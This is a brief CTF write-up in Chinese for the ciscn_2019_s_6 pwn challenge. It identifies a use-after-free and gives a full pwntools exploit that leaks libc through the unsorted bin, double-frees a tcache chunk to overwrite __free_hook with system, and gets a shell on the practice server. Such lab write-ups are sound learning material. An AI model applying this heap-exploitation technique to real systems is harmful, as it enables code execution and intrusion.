ciscn_2019_s_6:
保护全开
漏洞分析:
指针未清零,存在uaf
大致步骤:
利用unsortbin泄露libc,doublefree劫持free_hook为system
exp:
from pwn import *
local_file = './ciscn_s_6'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',27542 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
def debug(cmd=''):
gdb.attach(r,cmd)
#---------------------
def add(size,name):
sla('choice:','1')
sla('Please input the size of compary\'s name\n',str(size))
sa('please input name:\n',name)
sa('please input compary call:\n','198')
def show(index):
sla('choice:','2')
sla('Please input the index:\n',str(index))
def delete(index):
sla('choice:','3')
sla('Please input the index:',str(index))
#---------------------
add(0x410,'aaaa')
add(0x30,'/bin/sh\x00')
delete(0)
show(0)
libc_base=uu64(ru('\x7f')[-6:])-96-0x10-libc.sym['__malloc_hook']
print 'libc_base='+str(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#-------------------------
add(0x30,'aaaa')
delete(2)
delete(2)
add(0x30,p64(free_hook))
add(0x30,p64(0))
add(0x30,p64(system))
delete(1)
#debug()
r.interactive()